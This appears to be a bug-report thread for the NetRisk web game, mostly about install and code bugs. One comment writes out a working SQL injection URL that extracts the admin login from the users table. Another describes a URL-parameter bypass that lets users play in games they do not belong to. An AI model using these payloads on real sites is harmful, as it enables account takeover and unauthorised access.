-
When I install NetRisk 2.0 it claims that all tables has been created, but it's just netrisk_config that really has.
Any clues?
Regards
Per Herkel
Sweden.
2009-02-03 09:20:11 UTC by p_herkel
-
http://www.secumania.org/exploits/web-applications/netrisk-1.9.7-%28xss_sql%29-multiple-remote-vulnerabilities-2008010638553/
1.sql injection:
get admin login name:
http://site.com/patch/index.php?page=profile&pid=-1/**/union/**/select/**/1,2,login,4,5,6,7,8,9,10,11/**/from/**/users/**/where/**/id=1/*
---
get admin pass...
2008-03-05 03:16:44 UTC by nobody
-
admin/news_post.php is refering to the nonexisting stylesheet styles/styles.css.
2007-12-25 11:28:17 UTC by nobody
-
The file LICENSE is missing in netrisk_1.9.7.patched.zip.
2007-12-25 11:24:14 UTC by nobody
-
This version of control.php is better :
2007-10-25 21:43:47 UTC by nobody
-
I resolve it in that way:
1-Create a file called control.php
2- Copy and past this lines
2007-10-24 23:57:52 UTC by nobody
-
All version of net risk have a big security bug:
That's the way to show it:
1-Register
2- click on a game where you aren't a player
3- change ..../index.php?page=includes/notplayer&id=...
whit
.../game.php
You can move and defeact! You can also play to the game that have the password!! It's a big problem, please try to resolve!
2007-10-24 20:39:09 UTC by nobody
-
Only displays two different pages...
Then goes back to the front page.
I would imagine NEXT should goto the next set of games
older...and older...
Possibly putting NEXT and PREVIOUS on the top of the
browser of something...
2006-10-30 01:53:48 UTC by nobody
-
Thanx for the fix...
2006-10-24 17:50:26 UTC by nobody
-
In Version 1.95
There is a bug in player_avatar.php:
require_once('includes/config.php');
should be replaced by:
require_once('includes/_db.config.php');.
2006-10-15 18:56:07 UTC by garbor
